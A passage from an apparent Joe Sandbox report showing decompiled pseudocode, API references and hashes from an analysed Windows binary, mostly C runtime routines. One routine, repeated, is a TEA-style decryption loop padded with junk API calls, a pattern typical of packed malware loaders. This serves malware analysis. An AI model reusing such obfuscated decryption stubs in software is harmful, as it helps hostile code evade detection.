                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                					if(__eax == 0) {
                						goto L6;
                					} else {
                						_push(0);
                						return __eax;
                					}
                				}
                			}







                0x004089d6
                0x004089de
                0x004089f5
                0x004089a1
                0x004089aa
                0x004089b6
                0x004089b9
                0x004089bc
                0x004089be
                0x004089c1
                0x004089c6
                0x004089d0
                0x004089c8
                0x004089cc
                0x004089cc
                0x004089e0
                0x004089e6
                0x004089ee
                0x00000000
                0x004089f0
                0x004089f0
                0x004089f4
                0x004089f4
                0x004089ee

                APIs
                • GetModuleHandleA.KERNEL32(KERNEL32,0040671D), ref: 004089D6
                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004089E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsProcessorFeaturePresent$KERNEL32
                • API String ID: 1646373207-3105848591
                • Opcode ID: 02cee7d4ee86e4cc822ed6d978d1876af1daa32e2c9aa6aef9fd0d2926bb3944
                • Instruction ID: 57d0a6ecc1cad4e6ab15008b744191ff4a238e2872d960fa128aec9b581cd1d3
                • Opcode Fuzzy Hash: 02cee7d4ee86e4cc822ed6d978d1876af1daa32e2c9aa6aef9fd0d2926bb3944
                • Instruction Fuzzy Hash: DBF03071A00A09E2DF002BA5BE0E6BF7A78BBC4745F9205B5E1D2B40E5DF348075D25A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00415899(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				char _v20;
                				signed int _t54;
                				intOrPtr _t56;
                				int _t57;
                				int _t58;
                				signed short* _t59;
                				short* _t60;
                				int _t65;
                				char* _t72;
                
                				_t72 = _a8;
                				if(_t72 == 0 || _a12 == 0) {
                					L5:
                					return 0;
                				} else {
                					if( *_t72 != 0) {
                						E00407DE5( &_v20, _a16);
                						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                							if(E00410E72( *_t72 & 0x000000ff,  &_v20) == 0) {
                								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                									L10:
                									if(_v8 != 0) {
                										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                									}
                									return 1;
                								}
                								L21:
                								_t54 = E00407A37();
                								 *_t54 = 0x2a;
                								if(_v8 != 0) {
                									_t54 = _v12;
                									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                								}
                								return _t54 | 0xffffffff;
                							}
                							_t56 = _v20;
                							_t65 =  *(_t56 + 0xac);
                							if(_t65 <= 1 || _a12 < _t65) {
                								L17:
                								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                									goto L21;
                								} else {
                									goto L19;
                								}
                							} else {
                								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                								_t56 = _v20;
                								if(_t58 != 0) {
                									L19:
                									_t57 =  *(_t56 + 0xac);
                									if(_v8 == 0) {
                										return _t57;
                									}
                									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                									return _t57;
                								}
                								goto L17;
                							}
                						}
                						_t59 = _a4;
                						if(_t59 != 0) {
                							 *_t59 =  *_t72 & 0x000000ff;
                						}
                						goto L10;
                					} else {
                						_t60 = _a4;
                						if(_t60 != 0) {
                							 *_t60 = 0;
                						}
                						goto L5;
                					}
                				}
                			}














                0x004158a3
                0x004158aa
                0x004158c1
                0x00000000
                0x004158b1
                0x004158b3
                0x004158cd
                0x004158d8
                0x0041590a
                0x004159a8
                0x004158e8
                0x004158eb
                0x004158f0
                0x004158f0
                0x00000000
                0x004158f6
                0x0041596a
                0x0041596a
                0x0041596f
                0x00415978
                0x0041597a
                0x0041597d
                0x0041597d
                0x00000000
                0x00415981
                0x0041590c
                0x0041590f
                0x00415918
                0x0041593f
                0x00415948
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041591f
                0x00415932
                0x0041593a
                0x0041593d
                0x0041594f
                0x0041594f
                0x00415958
                0x004158c6
                0x004158c6
                0x00415961
                0x00000000
                0x00415961
                0x00000000
                0x0041593d
                0x00415918
                0x004158da
                0x004158df
                0x004158e5
                0x004158e5
                0x00000000
                0x004158b5
                0x004158b5
                0x004158ba
                0x004158be
                0x004158be
                0x00000000
                0x004158ba
                0x004158b3

                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004158CD
                • __isleadbyte_l.LIBCMT ref: 00415901
                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000020), ref: 00415932
                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000000,00000000,00000000,00000020), ref: 004159A0
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 3165f7a1591a3e5126c19513f8fe7a8072614e85e309bf4bbe1f791783791db4
                • Instruction ID: ec5796e9c8a6976b4aba741237d0039bc9180dcf3f7e8c6efdb4566ece476920
                • Opcode Fuzzy Hash: 3165f7a1591a3e5126c19513f8fe7a8072614e85e309bf4bbe1f791783791db4
                • Instruction Fuzzy Hash: AF31DF71A10786EFDB10EFA4C8809EE3BB0FF41320F14856AE4619B2A1D734DD91DB59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040889C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				intOrPtr _t25;
                				void* _t26;
                				void* _t28;
                
                				_t25 = _a16;
                				if(_t25 == 0x65 || _t25 == 0x45) {
                					_t26 = E0040818D(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                					goto L9;
                				} else {
                					_t34 = _t25 - 0x66;
                					if(_t25 != 0x66) {
                						__eflags = _t25 - 0x61;
                						if(_t25 == 0x61) {
                							L7:
                							_t26 = E0040827D(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                						} else {
                							__eflags = _t25 - 0x41;
                							if(__eflags == 0) {
                								goto L7;
                							} else {
                								_t26 = E004087A2(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                							}
                						}
                						L9:
                						return _t26;
                					} else {
                						return E004086E7(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                					}
                				}
                			}






                0x004088a1
                0x004088a7
                0x0040891a
                0x00000000
                0x004088ae
                0x004088ae
                0x004088b1
                0x004088cc
                0x004088cf
                0x004088ef
                0x00408901
                0x004088d1
                0x004088d1
                0x004088d4
                0x00000000
                0x004088d6
                0x004088e8
                0x004088e8
                0x004088d4
                0x0040891f
                0x00408923
                0x004088b3
                0x004088cb
                0x004088cb
                0x004088b1

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction ID: 19b88a8126ccfeb9b30191c1c46ef1a0eabf4c77fa7b0ab52f6ac590ac67130b
                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction Fuzzy Hash: F611837200014EBBCF126E85CD05CEE3F22BF58354B58846AFA9869175CB3BC971AB85
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040E67F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t13;
                				intOrPtr _t27;
                				intOrPtr _t29;
                				void* _t30;
                				void* _t31;
                
                				_t31 = __eflags;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ebx;
                				_push(0xc);
                				_push(0x418568);
                				E0040B9DC(__ebx, __edi, __esi);
                				_t29 = E00409512(__ebx, __edx, _t31);
                				_t13 =  *0x42cbb4; // 0xfffffffe
                				if(( *(_t29 + 0x70) & _t13) == 0) {
                					L6:
                					E0040AEE2(_t22, _t26, 0xc);
                					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                					_t8 = _t29 + 0x6c; // 0x6c
                					_t27 =  *0x42cc98; // 0x42cbc0
                					 *((intOrPtr*)(_t30 - 0x1c)) = E0040E641(_t8, _t27);
                					 *(_t30 - 4) = 0xfffffffe;
                					E0040E6E9();
                				} else {
                					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                						goto L6;
                					} else {
                						_t29 =  *((intOrPtr*)(E00409512(_t22, __edx, _t33) + 0x6c));
                					}
                				}
                				if(_t29 == 0) {
                					E0040CB0F(_t25, 0x20);
                				}
                				return E0040BA21(_t29);
                			}








                0x0040e67f
                0x0040e67f
                0x0040e67f
                0x0040e67f
                0x0040e67f
                0x0040e681
                0x0040e686
                0x0040e690
                0x0040e692
                0x0040e69a
                0x0040e6be
                0x0040e6c0
                0x0040e6c6
                0x0040e6ca
                0x0040e6cd
                0x0040e6d8
                0x0040e6db
                0x0040e6e2
                0x0040e69c
                0x0040e69c
                0x0040e6a0
                0x00000000
                0x0040e6a2
                0x0040e6a7
                0x0040e6a7
                0x0040e6a0
                0x0040e6ac
                0x0040e6b0
                0x0040e6b5
                0x0040e6bd

                APIs
                • __getptd.LIBCMT ref: 0040E68B
                  • Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
                  • Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522
                • __getptd.LIBCMT ref: 0040E6A2
                • __amsg_exit.LIBCMT ref: 0040E6B0
                • __lock.LIBCMT ref: 0040E6C0
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                • String ID:
                • API String ID: 3521780317-0
                • Opcode ID: 2455b8867dcdb927ccdc6165670b750a8811849d711ce990018c8ce486c4457f
                • Instruction ID: d31bda54aa689c2b7a6ddd1ad9f9c0239bded3712d5880fca87267f077040aa8
                • Opcode Fuzzy Hash: 2455b8867dcdb927ccdc6165670b750a8811849d711ce990018c8ce486c4457f
                • Instruction Fuzzy Hash: 4DF06D32A403049BD621EBABA40279D32A0AF10718F904A7FA440B72D2CB3D9951DE9E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E004044B0(signed int _a4, signed int _a8) {
                				unsigned int _v8;
                				char _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				unsigned int _t43;
                				signed int _t49;
                				signed int _t55;
                				unsigned int* _t63;
                				intOrPtr* _t64;
                				char _t73;
                				signed int _t74;
                				unsigned int _t75;
                
                				_t64 = _a8;
                				_t63 = _a4;
                				_t43 =  *_t63;
                				_v28 =  *_t64;
                				_t75 = _t63[1];
                				_v32 =  *((intOrPtr*)(_t64 + 4));
                				_t73 = 0xc6ef3720;
                				_v8 = _t43;
                				_v12 = 0xc6ef3720;
                				_v20 =  *((intOrPtr*)(_t64 + 8));
                				_v24 =  *((intOrPtr*)(_t64 + 0xc));
                				_v16 = 0x20;
                				while(1) {
                					_a4 = (_t43 << 4) + _v20;
                					_a8 = _t43 >> 5;
                					_a8 = _a8 + _v24;
                					_push(_t73 + _t43);
                					_push( &_a4);
                					 *0x5565fc = 0xffcf03fc;
                					E00403E1E();
                					_t49 = _a8 ^ _a4;
                					 *0x5565fc =  *0x5565fc & 0x00000000;
                					_t75 = _t75 - _t49;
                					_a8 = _t49;
                					_a4 = _t75 << 4;
                					_a4 = _a4 + _v28;
                					_t74 = _t73 + _t75;
                					if( *0x557154 == 0x1be) {
                						__imp__RequestWakeupLatency(0);
                						CreateSemaphoreA(0, 0, 0, 0);
                					}
                					 *0x556604 =  *0x556604 | 0xffffffff;
                					_a4 = _a4 ^ _t74;
                					_t55 = (_t75 >> 5) + _v32;
                					 *0x556600 = 0xff6b3619;
                					_push(_t55);
                					_a8 = _t55;
                					_push( &_a4);
                					E00403E1E();
                					_v8 = _v8 - _a4;
                					E00403DF3( &_v12, 0x9e3779b9);
                					_t39 =  &_v16;
                					 *_t39 = _v16 - 1;
                					_t43 = _v8;
                					if( *_t39 == 0) {
                						break;
                					}
                					_t73 = _v12;
                				}
                				_t63[1] = _t75;
                				 *_t63 = _t43;
                				return _t43;
                			}


















                0x004044b6
                0x004044bc
                0x004044bf
                0x004044c1
                0x004044c8
                0x004044cb
                0x004044d5
                0x004044da
                0x004044dd
                0x004044e0
                0x004044e3
                0x004044e6
                0x004044f2
                0x004044fa
                0x00404503
                0x00404509
                0x0040450c
                0x00404510
                0x00404511
                0x0040451b
                0x00404523
                0x00404526
                0x0040452d
                0x0040452f
                0x00404537
                0x0040453d
                0x00404540
                0x0040454c
                0x00404550
                0x0040455c
                0x0040455c
                0x00404562
                0x00404569
                0x00404571
                0x00404574
                0x0040457e
                0x0040457f
                0x00404585
                0x00404586
                0x0040458e
                0x0040459a
                0x0040459f
                0x0040459f
                0x004045a2
                0x004045a5
                0x00000000
                0x00000000
                0x004044ef
                0x004044ef
                0x004045ac
                0x004045b0
                0x004045b4

                APIs
                • RequestWakeupLatency.KERNEL32(00000000,?,?,?,9E3779B9,?,?,?,?), ref: 00404550
                • CreateSemaphoreA.KERNEL32 ref: 0040455C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: CreateLatencyRequestSemaphoreWakeup
                • String ID:
                • API String ID: 2006799495-3916222277
                • Opcode ID: 0eb82fd03b348087bd45211c961d9e2cc6cf7949bf343311f87aeb407d63acd7
                • Instruction ID: cc64bf41ec901de7807c0f5813e53aab430dd298e59a5649dfc116f49a635d9b
                • Opcode Fuzzy Hash: 0eb82fd03b348087bd45211c961d9e2cc6cf7949bf343311f87aeb407d63acd7
                • Instruction Fuzzy Hash: BF31ECB5900219EFDB00CFA9C48599EBBF8FF48355F50C16AE919EB250D3349A45CF94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E004044AF(void* __edx, signed int _a4, signed int _a8) {
                				unsigned int _v8;
                				char _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v117;
                				unsigned int _t45;
                				signed int _t51;
                				signed int _t57;
                				unsigned int* _t66;
                				intOrPtr* _t68;
                				char _t79;
                				signed int _t80;
                				unsigned int _t83;
                
                				_v117 = _v117 + __edx;
                				_t68 = _a8;
                				_t66 = _a4;
                				_t45 =  *_t66;
                				_v28 =  *_t68;
                				_t83 = _t66[1];
                				_v32 =  *((intOrPtr*)(_t68 + 4));
                				_t79 = 0xc6ef3720;
                				_v8 = _t45;
                				_v12 = 0xc6ef3720;
                				_v20 =  *((intOrPtr*)(_t68 + 8));
                				_v24 =  *((intOrPtr*)(_t68 + 0xc));
                				_v16 = 0x20;
                				while(1) {
                					_a4 = (_t45 << 4) + _v20;
                					_a8 = _t45 >> 5;
                					_a8 = _a8 + _v24;
                					_push(_t79 + _t45);
                					_push( &_a4);
                					 *0x5565fc = 0xffcf03fc;
                					E00403E1E();
                					_t51 = _a8 ^ _a4;
                					 *0x5565fc =  *0x5565fc & 0x00000000;
                					_t83 = _t83 - _t51;
                					_a8 = _t51;
                					_a4 = _t83 << 4;
                					_a4 = _a4 + _v28;
                					_t80 = _t79 + _t83;
                					if( *0x557154 == 0x1be) {
                						__imp__RequestWakeupLatency(0);
                						CreateSemaphoreA(0, 0, 0, 0);
                					}
                					 *0x556604 =  *0x556604 | 0xffffffff;
                					_a4 = _a4 ^ _t80;
                					_t57 = (_t83 >> 5) + _v32;
                					 *0x556600 = 0xff6b3619;
                					_push(_t57);
                					_a8 = _t57;
                					_push( &_a4);
                					E00403E1E();
                					_v8 = _v8 - _a4;
                					E00403DF3( &_v12, 0x9e3779b9);
                					_t41 =  &_v16;
                					 *_t41 = _v16 - 1;
                					_t45 = _v8;
                					if( *_t41 != 0) {
                						_t79 = _v12;
                						continue;
                					}
                					_t66[1] = _t83;
                					 *_t66 = _t45;
                					return _t45;
                				}
                			}



















                0x004044af
                0x004044b6
                0x004044bc
                0x004044bf
                0x004044c1
                0x004044c8
                0x004044cb
                0x004044d5
                0x004044da
                0x004044dd
                0x004044e0
                0x004044e3
                0x004044e6
                0x004044f2
                0x004044fa
                0x00404503
                0x00404509
                0x0040450c
                0x00404510
                0x00404511
                0x0040451b
                0x00404523
                0x00404526
                0x0040452d
                0x0040452f
                0x00404537
                0x0040453d
                0x00404540
                0x0040454c
                0x00404550
                0x0040455c
                0x0040455c
                0x00404562
                0x00404569
                0x00404571
                0x00404574
                0x0040457e
                0x0040457f
                0x00404585
                0x00404586
                0x0040458e
                0x0040459a
                0x0040459f
                0x0040459f
                0x004045a2
                0x004045a5
                0x004044ef
                0x00000000
                0x004044ef
                0x004045ac
                0x004045b0
                0x004045b4
                0x004045b4

                APIs
                • RequestWakeupLatency.KERNEL32(00000000,?,?,?,9E3779B9,?,?,?,?), ref: 00404550
                • CreateSemaphoreA.KERNEL32 ref: 0040455C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: CreateLatencyRequestSemaphoreWakeup
                • String ID:
                • API String ID: 2006799495-3916222277
                • Opcode ID: 81c969f4688928daf9f615fa05fa870140ee97bc1cd20f437ee572b840144bf4
                • Instruction ID: c022bd11821d03e692977b1f4f15d8c9e0db611d7fe6b8fe4fbda9f3c376d92a
                • Opcode Fuzzy Hash: 81c969f4688928daf9f615fa05fa870140ee97bc1cd20f437ee572b840144bf4
                • Instruction Fuzzy Hash: B0311CB1900218EFDB00CFA9C884A9EBBF8FF48354F10C16AE919EB250D3349A45CF94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00409DE3(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                				intOrPtr _t17;
                				intOrPtr* _t28;
                				void* _t29;
                				void* _t30;
                
                				_t30 = __eflags;
                				_t28 = __esi;
                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                				E00406DFD(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                				 *((intOrPtr*)(E00409512(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                				_t17 = E00409512(__ebx, __edx, _t30);
                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                							_t17 = E00406DD6( *((intOrPtr*)(_t28 + 0x18)));
                							_t38 = _t17;
                							if(_t17 != 0) {
                								_push( *((intOrPtr*)(_t29 + 0x10)));
                								_push(_t28);
                								return E00409B7B(_t38);
                							}
                						}
                					}
                				}
                				return _t17;
                			}







                0x00409de3
                0x00409de3
                0x00409de6
                0x00409dec
                0x00409dfa
                0x00409e00
                0x00409e08
                0x00409e14
                0x00409e1c
                0x00409e24
                0x00409e38
                0x00409e43
                0x00409e49
                0x00409e4b
                0x00409e4d
                0x00409e50
                0x00000000
                0x00409e57
                0x00409e4b
                0x00409e38
                0x00409e24
                0x00409e58

                APIs
                  • Part of subcall function 00406DFD: __getptd.LIBCMT ref: 00406E03
                  • Part of subcall function 00406DFD: __getptd.LIBCMT ref: 00406E13
                • __getptd.LIBCMT ref: 00409DF2
                  • Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
                  • Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522
                • __getptd.LIBCMT ref: 00409E00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: 70aa3b42a859bc27a122939194ef38eab9ee9ac4b25228116e72d4fe29761a82
                • Instruction ID: 1240bdf0a63cacbcf5ace55a296ce2fd6dff42ec2483333423e0cb720c473221
                • Opcode Fuzzy Hash: 70aa3b42a859bc27a122939194ef38eab9ee9ac4b25228116e72d4fe29761a82
                • Instruction Fuzzy Hash: CF0128368013459ACF34EF26C444AAEB3B5BF10715F54493FE085766E2CB389D94DB89
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00406401() {
                				intOrPtr _v16;
                				void* _v28;
                				void* _v64;
                				void* _v104;
                				void* __esi;
                				void* _t17;
                				intOrPtr* _t19;
                				void* _t20;
                				void* _t21;
                				intOrPtr* _t22;
                				void* _t24;
                
                				_push(0x44);
                				E0040731A(E00415DEC, _t17, _t20, _t21);
                				E00405A38(_t24 - 0x28, _t20, "invalid string position");
                				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                				_t19 = _t24 - 0x50;
                				E0040637A(_t19, _t24 - 0x28);
                				E00406A7D(_t24 - 0x50, 0x4181a8);
                				asm("int3");
                				_push(_t24);
                				_push(_t21);
                				_push(_v16);
                				_t22 = _t19;
                				E00405A9F(_t19);
                				 *_t22 = 0x40149c;
                				return _t22;
                			}














                0x00406401
                0x00406408
                0x00406415
                0x0040641a
                0x00406422
                0x00406425
                0x00406433
                0x00406438
                0x0040643b
                0x0040643e
                0x0040643f
                0x00406442
                0x00406444
                0x00406449
                0x00406453

                APIs
                • __EH_prolog3.LIBCMT ref: 00406408
                • __CxxThrowException@8.LIBCMT ref: 00406433
                  • Part of subcall function 00406A7D: RaiseException.KERNEL32(?,?,|j@,?,?,?,?,?,00406A7C,?,h@~A,00557578,?,00405205,?), ref: 00406ABF
                  • Part of subcall function 00405A9F: __EH_prolog.LIBCMT ref: 00405AA4
                  • Part of subcall function 00405A9F: std::exception::exception.LIBCMT ref: 00405AB5
                Strings
                • invalid string position, xrefs: 0040640D
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::exception::exception
                • String ID: invalid string position
                • API String ID: 3550033118-1799206989
                • Opcode ID: c1d101fb347f93dce07b9d728a26b91a4609d6f6a966017caeb88913e8f73cdb
                • Instruction ID: 7552e81f6852f15b5c4d52f5a4b032a413189625ab58f5dbca60e36dab62462b
                • Opcode Fuzzy Hash: c1d101fb347f93dce07b9d728a26b91a4609d6f6a966017caeb88913e8f73cdb
                • Instruction Fuzzy Hash: B1F01C72A00218A7CB10FAD2CC45EDEB778EF50365F14453BB605B61D2DABC99548B98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00405A66(void* __edi) {
                				intOrPtr* _t26;
                				intOrPtr _t30;
                				intOrPtr* _t34;
                				void* _t36;
                
                				E00406EB0(E00415D6E, _t36);
                				E00405A38(_t36 - 0x28, __edi, "vector<T> too long");
                				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
